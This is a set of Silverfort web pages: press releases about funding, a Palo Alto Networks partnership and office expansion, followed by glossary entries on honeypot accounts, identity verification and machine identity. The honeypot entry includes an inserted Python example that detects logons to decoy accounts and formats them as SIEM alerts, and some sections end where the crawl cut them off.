“Dramatic changes in today’s enterprise environment, including IoT and cloud, create a new attack surface that calls for a new breed of authentication solutions,” said Shahar Tzafrir, Managing Partner at TLV Partners, who will be joining the Silverfort board. “Many security vendors offer multi-factor authentication solutions for modern web applications. But how do you apply the same protection to medical IoT devices, critical industrial systems, or shared folders that could be exposed to ransomware? And how do you deliver it across a hybrid or multi-cloud environment with thousands of virtual assets that are changing every day? Silverfort solves these problems for its customers by enabling strong authentication across all users, assets and environments in a unified, non-intrusive and seamless manner. The company has developed impressive patent-pending technology, built a very strong team, and is uniquely positioned to disrupt the authentication market.”

“We are excited to announce our Series A and to continue our growth with the support of such great investors,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “Our goal is to enable strong authentication across all enterprise assets without reducing productivity. Existing authentication solutions can no longer handle the scale, diversity and dynamic nature of today’s networks. With compromised credentials being leveraged in 81% of all data breaches, it is clear that these solutions must evolve. Silverfort introduces the next generation of authentication solutions, seamlessly enabling strong authentication everywhere without any modifications to endpoints and servers. We are receiving amazing reactions from the market and plan to use the new investment to meet this demand.”

On top of its unique authentication platform, Silverfort built a powerful AI-based policy engine. The platform’s broad coverage provides an important advantage – the ability to learn user behavior across all systems and environments, and to enforce adaptive authentication wherever needed with minimal impact on user experience. To further improve it, Silverfort integrates with leading 3rd party security products (for example, the recently announced partnership with Palo Alto Networks), and can trigger step-up authentication according to their alerts. These integrations enable real-time threat prevention without blocking legitimate users, therefore improving both security and productivity.

Silverfort was founded in 2016 by Hed Kovetz, Matan Fattal and Yaron Kassner, a group of top cybersecurity and cryptography experts from the elite 8200 cyber unit of the Israeli Intelligence Corps, with substantial industry experience. Following the new investment, the company plans to expand its sales, marketing, security research and engineering teams in the US, Israel and Europe. For open positions, visit silverfort.com/careers.

### About Silverfort

Silverfort delivers strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks even across complex, dynamic networks, including hybrid and multi-cloud environments.
The company has received world-wide recognition and several industry awards, including the InfoSecurity 2018 Global Excellence Awards for Best Authentication Product and Best User and Entity Behavior Analytics Product, the Frost & Sullivan 2017 New Product Innovation Award, and is a gold winner of the Cybersecurity Excellence Awards in the Multi Factor Authentication category. Contact us to learn more - silverfort.com/contact.

Contact: P: 646.893.7857 E: info@silverfort.pmco.co.il

---

- Published: 2018-05-17
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-announces-new-partnership-palo-alto-networks/

ANAHEIM, Calif., May 22, 2018 — Silverfort, which enables strong authentication across entire corporate networks and cloud environments without any modifications to endpoints and servers, today unveiled its threat-driven multifactor authentication app for the Palo Alto Networks® (NYSE: PANW) Application Framework. By combining the powerful threat detection capabilities of Palo Alto Networks with Silverfort’s agentless authentication technology, the new app will automatically enforce step-up authentication for suspicious users, based on real-time alerts from the Palo Alto Networks Application Framework. Upon indication from the Palo Alto Networks Application Framework, Silverfort gives suspected users a chance to prove their identity and continue to work, while effectively blocking malicious entities. The results can be provided as feedback to the Palo Alto Networks Application Framework, allowing security teams to focus on actual threats and reduce false positives.

Consuming cybersecurity innovations has become an arduous process. Organizations waste time deploying new sensors every time they want to collect a new piece of data and managing point products rather than improving security controls to stay ahead of attackers.
The Palo Alto Networks Application Framework makes it easy to add new security capabilities quickly and efficiently. The framework extends the capabilities of the Palo Alto Networks Security Operating Platform, with a suite of APIs that developers can use to connect innovative apps with rich data, threat intelligence and enforcement points. Organizations gain immediate security value from apps developed by an open ecosystem of trusted innovators.

Silverfort offers a unique authentication platform for enterprises, which enables multifactor authentication and adaptive AI-based authentication without requiring any modifications to endpoints and servers. Using patent-pending technology, Silverfort can apply multifactor authentication even for systems that don’t support it today, including proprietary systems, IoT devices, shared folders, critical infrastructure and more. Silverfort allows its customers to deliver strong authentication across large, dynamic environments, without deploying any software agents or inline gateways.

### QUOTES

“Joining the Palo Alto Networks Application Framework allows us to deliver unique value for our customers. When trying to handle large numbers of security alerts, it’s not always clear when to apply automatic prevention. While real-time prevention is important, it often results in blocking of legitimate users. As part of the Palo Alto Networks Application Framework, we will be able to trigger step-up authentication based on real-time security alerts, and help companies achieve real-time prevention without reducing the productivity of their legitimate users.”
- Hed Kovetz, CEO and co-founder of Silverfort

“We are delighted to welcome Silverfort to the Palo Alto Networks Application Framework developer community. The framework provides our customers with superior security through cloud-based apps developed by innovative security providers, large and small.
Together, we are fueling innovation in the cybersecurity market with apps that are built rapidly, engineered on a common framework, and deliver unique value while solving our customers’ toughest security challenges.”
- Lee Klarich, chief product officer, Palo Alto Networks

### AVAILABILITY

The Silverfort Authentication Platform is generally available, and the app will become available on the Palo Alto Networks Application Framework in August 2018. The Palo Alto Networks Application Framework is targeted for availability in August 2018 and will be available worldwide to customers who have purchased either Palo Alto Networks next-generation firewalls or Traps advanced endpoint protection and the Logging Service subscription.

### About Palo Alto Networks

We are the global cybersecurity leader, known for always challenging the security status quo. Our mission is to protect our way of life in the digital age by preventing successful cyberattacks. This has given us the privilege of safely enabling tens of thousands of organizations and their customers. Our pioneering Security Operating Platform emboldens their digital transformation with continuous innovation that seizes the latest breakthroughs in security, automation, and analytics. By delivering a true platform and empowering a growing ecosystem of change-makers like us, we provide highly effective and innovative cybersecurity across clouds, networks, and mobile devices.

### About Silverfort

Silverfort protects enterprises from data breaches by preventing credential compromise and misuse across the entire corporate network and cloud infrastructure. Silverfort leverages patent-pending technology to monitor and secure all user authentication, from any device to any resource. Silverfort seamlessly enhances the basic authentication and access mechanisms used by all client devices and services, instantly equipping them with the latest authentication and access protection technology without any change or integration.
Contact us to learn more.

Contact: P: 646.893.7857 E: info@silverfort.pmco.co.il

---

- Published: 2018-02-22
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-expands-north-american-presence-new-offices-boston-houston/

### Silverfort Expands North American Presence with New Offices in Boston and Houston

Expansion enables Silverfort to strengthen its North American operations

TEL AVIV, Israel — Jan. 02, 2018 — Silverfort Inc., which offers a unique solution for delivering adaptive AI-based authentication across the entire corporate network and cloud without any change to endpoints and servers, announced today it is opening two new U.S. offices in Boston and Houston. Both offices will increase the company's footprint in North America by supporting its overall growth strategy. In addition to the company’s headquarters in Tel Aviv, the new offices will serve the sales team across North America and facilitate new hires across all departments, expanding the sales team and establishing new partner channels.

“The decision to open these new offices is part of our growth plan in the United States,” said Hed Kovetz, CEO of Silverfort. “Due to the growing need and challenges of applying strong authentication for a variety of corporate systems, applications and IoT devices, Silverfort is gaining a lot of interest for its innovative authentication platform, which can protect all those resources without integration.”

Silverfort’s patent-pending technology enables multifactor authentication and adaptive authentication (based on its AI engine) throughout an entire organization’s network, including all types of on-prem and cloud-based resources.
Silverfort’s platform automatically secures every physical and virtual resource in a cost-effective manner that demonstrates several unique features:

- Patent-pending technology keeps track of which user is accessing which resource from which device at which time, across the entire corporate network and cloud infrastructure. Based upon an organization’s policies and Silverfort’s risk analysis engine, Silverfort enforces proactive protection measures to verify the user’s identity and deny access if required.
- Silverfort’s advanced AI-based policy engine analyzes all authentication and access activity across the organization, and enforces proactive protection measures to verify the user’s identity and deny access, if needed. Silverfort’s unparalleled coverage assures holistic protection and accurate AI-based policy decisions.
- Silverfort can even protect resources that don’t support strong authentication at all, including infrastructure, IoT devices, proprietary systems and all types of servers and workstations.
- Silverfort is managed from a centralized platform, without requiring any integration with individual endpoints and servers, and without installing agents or in-line gateways. This is achieved by seamlessly adding protection layers over the existing authentication protocols, using patent-pending technology.

Based on its recent analysis of the Authentication and Access Management in Critical National Infrastructure market, Frost & Sullivan recognized Silverfort with its 2017 New Product Innovation Award. For more information, visit silverfortcnt.wpengine.com

### About Silverfort

Silverfort protects enterprises from data breaches by preventing credential compromise and misuse across the entire corporate network and cloud infrastructure. Silverfort leverages patent-pending technology to monitor and secure all user authentication, from any device to any resource.
Silverfort seamlessly enhances the basic authentication and access mechanisms used by all client devices and services, instantly equipping them with the latest authentication and access protection technology without any change or integration. Contact us to learn more.

Contact: P: 646.893.7857 E: info@silverfort.pmco.co.il

---

## Glossary

- Published: 2024-12-04
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/honeypot-account/

A decoy user account planted in a system solely to entice attackers and instantly alert the security team when accessed, enabling early breach detection.

Honeypot accounts are fake user accounts created within an organization's system with the sole purpose of attracting and alerting security teams of malicious activity. When an attacker attempts to access one of these accounts, it triggers an immediate alert to the SOC, enabling a swift response to potential threats.

### Differentiating Honeypot Accounts, Honeypots, and Honeypot Tokens

- Honeypot Accounts: These are decoy user accounts embedded within a system. They appear legitimate and blend seamlessly with real user accounts but have no actual purpose other than to serve as bait for attackers. Any interaction with a Honeypot account is inherently suspicious and indicates a possible security breach.
- Honeypots: Honeypots are entire systems or networked resources configured to attract cybercriminals. They mimic legitimate systems to lure attackers away from valuable assets and allow security teams to observe and analyze the tactics and techniques used by the intruders.
- Honeypot Tokens: These are small pieces of data, such as fake API keys, database entries, or documents, embedded within a network. When accessed, they send alerts to the security team, indicating a potential breach.

By using Honeypot accounts, organizations can create a more nuanced and layered security strategy.
These accounts provide an effective early warning system, highlighting unauthorized access attempts before attackers can cause significant harm.

### Advantages of Honeypot Accounts

Honeypot accounts offer a unique set of advantages that enhance an organization’s cybersecurity defenses by providing early detection of unauthorized access and reducing false positives. Here are the key benefits of implementing Honeypot accounts:

#### Fewer False Positives

Honeypot accounts are designed to be unused by legitimate users, meaning there is no legitimate reason for anyone to access them. Therefore, any interaction with these accounts is immediately flagged as suspicious. This specificity helps in avoiding false positives, a common issue with other security measures, thereby allowing security teams to focus on genuine threats.

#### Rapid Detection of Unauthorized Access

The moment an attacker tries to access a Honeypot account, an alert is triggered, enabling the security team to respond quickly. This rapid detection is crucial for mitigating potential damage and stopping the attacker before they can access sensitive data or disrupt operations.

#### Easy Integration and Maintenance

Setting up and maintaining Honeypot accounts is relatively straightforward. They can be seamlessly integrated into existing security infrastructures without significant overhead. Honeypot accounts do not require special hardware or complex configurations, making them an efficient and cost-effective addition to the security toolkit.

These advantages highlight why Honeypot accounts are becoming an increasingly popular tool in the cybersecurity landscape. They provide a clear, actionable signal of unauthorized activity, allowing for swift and effective responses.

### Setting Up Honeypot Accounts

Creating Honeypot accounts involves a series of strategic steps to ensure they are effective in detecting unauthorized access attempts while blending seamlessly into the existing user environment.
Here’s a step-by-step guide on how to set up Honeypot accounts:

1. Identify Target Location: Determine where the Honeypot account will be most effective. This could be within a financial database, user directory, or any other sensitive part of the system. The location should be strategically chosen to appear attractive to potential attackers.
2. Create the Account: Select a username and other details that appear realistic and blend in with genuine accounts. Avoid obvious names like "Honeypot_account" or "fakeuser01." Instead, use common naming conventions used within your organization.
3. Set Permissions: Assign permissions that make the account look valuable to attackers. These permissions should suggest high-level access but must not grant actual access to sensitive data. For example, label permissions as "admin" or "finance_manager" without real privileges.
4. Configure Alerts: Integrate the Honeypot account with your security monitoring tools. Set up alerts to be triggered for any activity related to this account. Use tools like Security Information and Event Management (SIEM) systems to automate and manage these alerts.
5. Test the Setup: Before deploying, thoroughly test the Honeypot account to ensure that alerts are triggered correctly and notifications are sent to the appropriate team members. This helps in verifying that the setup works as intended.
6. Monitor Continuously: Once deployed, continuously monitor the Honeypot account for any activity. Regular monitoring helps in early detection of any unauthorized attempts and allows for timely responses.
7. Review and Update: Regularly review the settings and details of the Honeypot account. Update them as necessary to keep up with evolving threats. This could involve changing account details, permissions, or even relocating the account to a different part of the system.

### Enhancing Honeypot Account Effectiveness

To maximize the effectiveness of Honeypot accounts, they must appear indistinguishable from legitimate user accounts.
Here are several best practices and advanced strategies to enhance the realism and efficacy of Honeypot accounts:

#### Tips for Making Honeypot Accounts Look Legitimate

- Use Realistic Names and Profiles: Select names that blend in with your organization’s existing user accounts. Avoid using obvious or generic names that could tip off an attacker. For example, instead of "fakeuser01," use a common naming convention like "j.doe" or "s.johnson."
- Grant Attractive Permissions: Assign permissions that suggest the account holds significant access, such as administrative or managerial roles. This makes the account more appealing to attackers. However, these permissions should be designed to appear valuable without providing actual access to sensitive systems or data.
- Associate Attractive Data: Link the Honeypot account to fake but seemingly valuable data. This could include dummy financial records, internal memos, or project documents. The idea is to create the illusion that the account has access to important information.
- Place Accounts in Multiple Locations: Distribute Honeypot accounts throughout various parts of your network to cover multiple potential entry points and attack vectors. This increases the likelihood of detecting unauthorized access attempts across different system segments.
- Periodic Changes: Regularly update the details and settings of your Honeypot accounts. This includes changing usernames, passwords, and associated permissions. Periodic updates help in keeping the accounts effective and prevent them from being easily detected by attackers over time.
- Prefer Aged Accounts: Repurpose old, inactive accounts instead of creating new ones. An account that has been in the system for several years appears more legitimate than a newly created one. Ensure these accounts are aged appropriately within your Active Directory (AD) environment.
- Scheduled Logins: Configure scheduled tasks to log in to the Honeypot account periodically.
This adds a layer of legitimacy, as completely inactive accounts can raise suspicion. Regular logins can make the account seem actively used.
- Password Management: Ensure the Honeypot account's password policies align with those of other accounts. If most accounts require periodic password changes, set similar policies for the Honeypot account to avoid raising red flags.
- Bad Password Attempts: Configure the Honeypot account to have occasional bad password attempts logged. Real users often make mistakes when entering passwords, and replicating this behavior can enhance the account's authenticity.
- Associate with Real User Accounts: If the Honeypot account is designed to look like an administrative or service account, ensure it has an associated user account that appears active. This can prevent attackers from easily identifying the account as a decoy.

### Common Use Cases and Examples

Honeypot accounts have been employed successfully across various industries to enhance security measures and provide early warnings of potential breaches. Here are some common use cases and examples illustrating their effectiveness:

#### Financial Institutions

In the financial sector, Honeypot accounts can be set up within customer databases and internal financial systems. For example, a Honeypot account labeled as a high-level finance manager might be created. This account would be linked to fake financial records or internal transfer permissions, making it an attractive target for attackers looking to access sensitive financial data. Upon any interaction with this account, security teams receive immediate alerts, allowing them to investigate and respond swiftly.

#### Enterprise Environments

Large enterprises often deal with numerous user accounts and varying levels of access. Honeypot accounts can be strategically placed within internal user directories, particularly in areas with high-value information such as HR databases or executive communication channels.
By monitoring these accounts, enterprises can detect insider threats or unauthorized attempts to access privileged information.

#### Healthcare Systems

Healthcare organizations can use Honeypot accounts within their electronic health record (EHR) systems. For instance, a Honeypot account might be set up as a senior doctor with access to sensitive patient records. If an attacker attempts to breach this account, it triggers an alert, helping to protect patient privacy and sensitive health data.

#### Government Agencies

Government agencies, which often deal with highly sensitive and classified information, can implement Honeypot accounts within their internal networks. These accounts can be designed to look like high-level administrative accounts with access to classified documents. Any unauthorized attempt to access these accounts can alert security teams to potential espionage or insider threats.

#### Example Scenario: Detection of Unauthorized Access

Consider a scenario where an IT department of a large corporation sets up a Honeypot account named "admin_j.smith" with permissions that suggest it has access to critical systems. The account is placed in an area of the network where attackers are likely to search for high-value targets. One day, an alert is triggered indicating that someone attempted to log in to "admin_j.smith" from an unusual IP address. The security team investigates and discovers that the IP address is associated with a known threat actor. By detecting this attempt early, the organization can take steps to mitigate the threat and secure its network before any real damage occurs.

### Integration with Cybersecurity Strategies

Effectively integrating Honeypot accounts into a broader cybersecurity strategy involves more than just their setup and deployment. To maximize their potential, these accounts must work in tandem with existing security tools and protocols.
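The detection side of the "admin_j.smith" scenario above, including the allowlist that the scheduled-login and bad-password tips require so the decoy's own maintenance activity does not page the SOC, as an added example that is not part of the original glossary entry. The event layout, the second decoy name, host names, address ranges and SIEM field names are constructed assumptions, not any vendor's format.

```python
"""Honeypot-account detection over constructed authentication events.
Added example, not Silverfort's code. Events are a simplified, constructed
stand-in for Windows Security logon events; names and addresses are made up."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Iterable, List, Optional

# Decoy accounts, each mapped to the maintenance host allowed to touch it.
# Without this allowlist the scheduled logins and deliberate bad-password
# attempts that keep the decoy looking real would page the SOC every night.
HONEYPOTS = {
    "admin_j.smith": {"maint-task01"},
    "svc_finance_mgr": {"maint-task01"},
}
# Address space the organisation owns (constructed). Checked explicitly rather
# than via is_private, which also treats 203.0.113.0/24 (TEST-NET-3) as private.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]
SUCCESS, FAILURE, TGT_REQUEST = 4624, 4625, 4768  # Windows Security event ids

# Constructed sample events: two nightly maintenance touches, one real user,
# then an interactive probe of the decoy and an attempt from outside.
SAMPLE_EVENTS = [
    {"ts": "2024-12-04T02:00:01Z", "event_id": SUCCESS, "account": "admin_j.smith",
     "src_host": "maint-task01", "src_ip": "10.0.5.20"},
    {"ts": "2024-12-04T02:00:03Z", "event_id": FAILURE, "account": "admin_j.smith",
     "src_host": "maint-task01", "src_ip": "10.0.5.20"},
    {"ts": "2024-12-04T09:14:22Z", "event_id": SUCCESS, "account": "j.doe",
     "src_host": "ws-0412", "src_ip": "10.0.7.33"},
    {"ts": "2024-12-04T11:42:09Z", "event_id": TGT_REQUEST, "account": "admin_j.smith",
     "src_host": "ws-0199", "src_ip": "10.0.9.77"},
    {"ts": "2024-12-04T11:42:10Z", "event_id": FAILURE, "account": "admin_j.smith",
     "src_host": "ws-0199", "src_ip": "10.0.9.77"},
    {"ts": "2024-12-04T11:42:11Z", "event_id": SUCCESS, "account": "admin_j.smith",
     "src_host": "ws-0199", "src_ip": "10.0.9.77"},
    {"ts": "2024-12-04T13:05:40Z", "event_id": FAILURE, "account": "svc_finance_mgr",
     "src_host": "", "src_ip": "203.0.113.45"},
]


@dataclass(frozen=True)
class Alert:
    ts: str
    account: str
    src_host: str
    src_ip: str
    event_id: int
    severity: str
    reason: str


def is_internal(ip: str) -> bool:
    """True when ip parses and falls inside the organisation's own ranges."""
    try:
        addr = ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def evaluate(event: dict, honeypots=HONEYPOTS) -> Optional[Alert]:
    """Return an Alert for any non-maintenance touch of a decoy, else None."""
    account = event["account"].lower()
    if account not in honeypots:
        return None  # real user: not this detector's job
    if event["src_host"] in honeypots[account]:
        return None  # expected scheduled-task activity
    # Any other interaction is suspicious by construction; a successful logon
    # means the decoy's credential has been obtained, so it outranks a failure.
    if event["event_id"] == SUCCESS:
        severity, reason = "critical", "successful logon to decoy account"
    else:
        severity, reason = "high", "logon attempt against decoy account"
    if not is_internal(event["src_ip"]):
        severity = "critical"
        reason += " from outside internal address space"
    return Alert(event["ts"], account, event["src_host"], event["src_ip"],
                 event["event_id"], severity, reason)


def detect(events: Iterable[dict], honeypots=HONEYPOTS) -> List[Alert]:
    """Run evaluate() over an event stream and keep the hits, in order."""
    return [a for a in (evaluate(e, honeypots) for e in events) if a is not None]


def to_siem_record(alert: Alert) -> dict:
    """Flatten an Alert into the key/value shape a SIEM rule or SOAR playbook
    would consume. Field names are this example's, not any vendor's."""
    return {
        "rule": "honeypot_account_interaction",
        "severity": alert.severity,
        "account": alert.account,
        "src_host": alert.src_host or "unknown",
        "src_ip": alert.src_ip,
        "event_id": alert.event_id,
        "timestamp": alert.ts,
        "reason": alert.reason,
        "recommended_action": "isolate source host; disable decoy; begin forensics",
    }


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(to_siem_record(alert))
```

Run against the sample stream, the two maintenance events and the real user produce nothing, while the four decoy touches from `ws-0199` and the external address each yield a record; the "Test the Setup" step in the guide is exactly this kind of dry run before the rule goes live.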
Here are key considerations and best practices for integrating Honeypot accounts into your overall cybersecurity framework:

#### Real-Time Monitoring and Alert Systems

- Security Information and Event Management (SIEM) Systems: SIEM platforms are essential for consolidating and analyzing security alerts. By integrating Honeypot accounts with SIEM systems, organizations can automate the monitoring process and ensure that any interaction with a Honeypot account triggers an immediate alert. Popular SIEM solutions like Splunk, IBM QRadar, and ArcSight can be configured to monitor Honeypot account activities and provide real-time notifications.
- Intrusion Detection and Prevention Systems (IDS/IPS): Honeypot accounts should be connected to IDS/IPS tools to detect and prevent malicious activities. These systems can identify patterns and behaviors associated with unauthorized access attempts, providing another layer of defense.

#### Incident Response Planning

- Developing an Incident Response Plan: Having a clear and well-documented incident response plan is crucial for dealing with alerts triggered by Honeypot accounts. This plan should outline the steps to be taken when an alert is received, including isolating affected systems, conducting a forensic analysis, and communicating with relevant stakeholders.
- Automated Responses: Leverage automation to streamline the response process. For instance, tools like SOAR (Security Orchestration, Automation, and Response) can help automate certain aspects of the incident response, such as blocking suspicious IP addresses or disabling compromised accounts.

#### Regular Review and Adaptation

- Periodic Assessments: Regularly review the effectiveness of Honeypot accounts and their integration with your security infrastructure. This includes analyzing alert patterns, false positives, and any changes in attack methods. Continuous assessment helps in fine-tuning the setup and improving detection capabilities.
- **Adapt to Evolving Threats:** Cyber threats are constantly evolving, and so should your Honeypot account strategy. Stay informed about the latest attack techniques and update your Honeypot accounts and associated configurations accordingly. This might involve changing account details, permissions, or even creating new Honeypot accounts in different parts of the system.

#### Leveraging Advanced Security Platforms

- **Specialized Tools and Platforms:** Consider using advanced security platforms that offer specialized features for managing Honeypot accounts. For example, CrowdStrike Falcon provides robust identity protection and can automate the setup, monitoring, and response processes for Honeypot accounts. Such platforms enhance the overall efficiency and effectiveness of your security operations.
- **Collaboration with Security Experts:** Engage with cybersecurity experts and vendors who can provide insights and best practices for deploying and managing Honeypot accounts. This collaboration can help in optimizing the use of Honeypot accounts within your organization’s specific context.

### Potential Challenges and Mitigation

While Honeypot accounts are powerful tools...

---

- Published: 2024-07-08
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/identity-verification/

The process of validating that an individual is who they claim to be, often through document checks, biometrics, knowledge-based methods, or multifactor authentication, to prevent fraud and ensure secure access.

Identity verification is the process of confirming that an individual is who they claim to be. Today, this process is essential in various domains, where transactions and interactions often occur remotely. It ensures that only authorized individuals can access services, execute tasks, and access sensitive information. The primary purpose of identity verification is to enhance security, prevent identity fraud, and comply with regulatory requirements.
Accurate identity verification is critical in sectors such as finance, healthcare, and e-commerce, where the risk of identity theft and fraud is high. By confirming identities accurately, organizations can protect themselves and their customers from malicious activities, ensure compliance with laws such as Know Your Customer (KYC) and Anti-Money Laundering (AML) regulations, and build trust with their users.

### Methods of Identity Verification

#### Document Verification

Traditional document verification involves checking government-issued documents such as passports, driver’s licenses, or ID cards. This method relies on human inspectors to visually verify the authenticity of the documents and the identity of the holder. Despite its common use, this approach is prone to human error and bias, and can be vulnerable to sophisticated forgery techniques. Additionally, it is time-consuming and lacks the scalability needed for handling high volumes of verifications, particularly in a digital context.

#### In-Person Verification

In-person verification requires individuals to physically present themselves at a verification center. An official then confirms their identity by comparing them to the provided identification documents. While this method can be highly accurate, it is logistically challenging and impractical for digital-first operations, as it cannot scale to meet the demands of remote or online transactions.

#### ID Document Verification

Digital ID document verification uses advanced technologies such as artificial intelligence (AI) and optical character recognition (OCR) to verify the authenticity of uploaded identification documents and match selfies with ID photos. This method is widely used by financial institutions during client onboarding.
By automating the verification process, it enhances accuracy and efficiency, reduces the potential for human error, and supports remote verification.

#### Knowledge-Based Authentication (KBA)

Knowledge-based authentication involves users answering personal security questions based on historical data. This method is often used for account recovery processes, such as when a user forgets their email password. While this method provides an additional security layer, it can be vulnerable if compromised credentials are used.

#### Biometric Authentication

Biometric authentication leverages unique physical characteristics such as fingerprints, facial recognition, voice patterns, and iris scans to verify identities. Commonly used in smartphones and high-security environments, biometrics offer a high level of security because they are difficult to forge. However, they raise privacy concerns and require robust data protection measures to secure biometric data.

#### Database Methods

Database methods involve cross-referencing user-provided information with authoritative databases. Examples include email and phone verification, where users receive a verification code to confirm their identity, and social verification, where users’ identities are validated through their social media accounts. These methods are efficient and scalable, making them ideal for online platforms.

#### Multi-Factor Authentication (MFA)

Multi-factor authentication combines multiple verification factors, such as passwords, biometrics, and one-time passwords, to enhance security. By requiring multiple proofs of identity, MFA provides robust protection against unauthorized access and is widely adopted across various digital services.

#### Behavioral Analysis

Behavioral analysis verifies user identities by analyzing their behavior patterns, such as typing speed, mouse movements, and interaction styles. This method can also consider environmental factors like location and device usage.
Behavioral analysis provides a low-friction and often invisible verification process, enhancing security without disrupting the user experience.

These methods collectively strengthen identity verification processes by addressing the limitations of traditional techniques and leveraging technological advancements to enhance security and user experience.

### Use Cases of Identity Verification

Identity verification is crucial across various sectors to ensure security, prevent fraud, and comply with regulatory requirements.

#### Financial Services

In the financial sector, identity verification is integral to activities such as opening bank accounts, applying for loans, and executing financial transactions. Banks and financial institutions are required to comply with Know Your Customer (KYC) regulations to prevent money laundering and other financial crimes. Verifying the identity of customers ensures that only legitimate individuals can access financial services, protecting both the institution and the customer from fraud and unauthorized access.

#### E-commerce

E-commerce platforms rely on identity verification to secure user accounts and transactions. During account creation, verifying the user’s identity helps prevent the creation of fraudulent accounts. During transactions, it ensures that the person making the purchase is indeed the account holder, thus reducing the risk of fraud and unauthorized transactions. This process is crucial for maintaining trust and security in online shopping environments.

#### Healthcare

In healthcare, identity verification ensures that sensitive medical information is accessed only by authorized individuals. This is vital for protecting patient privacy and maintaining the integrity of medical records. For healthcare providers, verifying the identity of patients and healthcare professionals helps ensure that treatments and services are administered correctly and securely.
#### Government Services

Government services also require robust identity verification processes. These are used for validating identities for access to various public services, benefits, and online tax filings. Accurate identity verification prevents fraud and identity theft, ensuring that services and benefits are provided to the right individuals. It is also essential in processes like voter registration and online voting, where verifying the identity of participants is crucial for the integrity of the electoral process.

#### Corporate Sector

In the corporate world, identity verification is critical for employee onboarding and access management. Verifying the identities of new hires ensures that only legitimate individuals are granted access to company resources. Ongoing verification helps manage access to sensitive systems and data, protecting the company from internal threats and unauthorized access. This process is essential for maintaining data security and operational integrity within organizations.

These use cases demonstrate the wide-ranging applications and importance of identity verification across different sectors, highlighting its role in enhancing security, compliance, and trust.

### Challenges in Identity Verification

#### Fraud and Forgery

One of the primary challenges is the potential for fraud and document forgery. Cybercriminals are adept at creating fake documents that can pass initial inspections, especially if the verification process relies on traditional methods. Advanced forgery techniques and the increasing availability of high-quality fake IDs make it challenging to ensure the authenticity of user identities. This is compounded by the sophistication of fraudulent schemes, which can exploit vulnerabilities in the verification process.

#### Human Error and Bias

Another significant challenge is human error and bias in the verification process.
Manual inspections are prone to mistakes, as even experienced verifiers can miss subtle signs of tampering or forgery. Additionally, human biases can affect judgment, leading to inconsistencies and potential misidentifications. These errors can undermine the reliability of the verification process and pose security risks.

#### Privacy Concerns

Balancing the need for thorough identity verification with privacy concerns is crucial. Users are increasingly aware of their privacy rights and are concerned about the amount of personal information they must share for verification purposes. Organizations must ensure that they collect and handle user data responsibly, complying with privacy regulations such as GDPR and CCPA. Failure to protect user data can lead to breaches, damaging trust and exposing users to further risks.

#### Scalability

Scalability is another challenge, particularly for organizations dealing with high volumes of user identities. Traditional verification methods often struggle to keep up with the demand, leading to delays and bottlenecks. This is especially problematic in sectors like e-commerce and finance, where quick and seamless user verification is critical for maintaining user satisfaction and operational efficiency.

#### Integration with Digital Systems

Integrating identity verification processes with existing digital systems can be complex. Many traditional methods are not designed for seamless integration with modern digital platforms, creating friction and slowing down processes. Organizations need to ensure that their verification systems are compatible with their digital infrastructure to provide a smooth user experience and maintain operational efficiency.

### Best Practices for Implementing Identity Verification

In the realm of cybersecurity, securing user identities is paramount. Effective implementation of identity verification processes and tools ensures robust protection against fraud and unauthorized access.
Here are the best practices:

#### Clear Communication

Organizations should clearly communicate the requirements and procedures for identity verification to users. Transparent and straightforward instructions help users understand what is expected, reducing errors and enhancing the verification process. Clear communication fosters user trust, as users feel informed and confident about the security measures in place.

#### Data Protection

Protecting user data is critical. Implementing strong encryption, access controls, and secure storage solutions ensures that personal information collected during the verification process is safeguarded against breaches and unauthorized access. Compliance with privacy regulations such as GDPR and CCPA is essential to maintaining user trust and avoiding legal penalties.

#### Consistent Support

Providing consistent support throughout the identity verification process is vital. Organizations should offer resources such as FAQs, chatbots, and dedicated customer service teams to assist users. Prompt and effective support helps resolve issues quickly, enhancing the user experience and ensuring smooth verification.

#### Diverse Methods

Using a variety of verification methods enhances the security of user identities. Combining biometric authentication, document verification, and knowledge-based questions creates multiple layers of defense, making it harder for fraudulent attempts to succeed. This multi-faceted approach adapts to different user needs and provides robust security.

#### Stay Updated

Regular updates to the verification processes and tools are crucial to counter evolving cyber threats. Incorporating the latest technologies, such as AI and machine learning, helps detect and prevent sophisticated fraud attempts. Continuous improvement ensures that the verification system remains effective and resilient.

#### Legal Adherence

Adhering to regulations like KYC, AML, GDPR, and CCPA is mandatory.
Compliance with these regulations not only avoids legal penalties but also builds trust with users by ensuring their data is handled ethically and responsibly. Regular audits and reviews of the verification processes help maintain compliance and identify areas for improvement.

#### Routine Check-ups

Conducting routine audits and evaluations of the identity verification system helps maintain its effectiveness. Regular check-ups can reveal vulnerabilities and inefficiencies, allowing organizations to make timely adjustments to enhance security and efficiency.

#### Decentralized Solutions

Exploring decentralized identity verification solutions can significantly enhance security and privacy. Technologies like blockchain offer secure and transparent ways to manage user identities, giving users more control over their personal information and reducing the risk of centralized data breaches.

---

- Published: 2024-07-02
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/machine-identity/

The digital credentials (such as certificates, cryptographic keys, and service accounts) assigned to devices, applications, and services, enabling trusted and authenticated machine-to-machine interactions.

Machine identity refers to the unique identifiers and cryptographic keys used to authenticate and authorize machines (such as devices, applications, and services) within a network. Just as human identities are verified using usernames and passwords, machine identities use digital certificates and cryptographic keys to ensure secure communication and data exchange between machines.

Machine identities are essential in today’s cyber landscape due to the exponential growth of connected devices and services. The rise of the Internet of Things (IoT), cloud computing, and microservices architecture has significantly increased the number of machines within organizational networks.
This rapid increase necessitates robust management of machine identities to maintain identity security, prevent unauthorized access, and ensure the integrity of communications.

### Importance of Machine Identity in Cybersecurity

Machine identity plays a critical role in cybersecurity by:

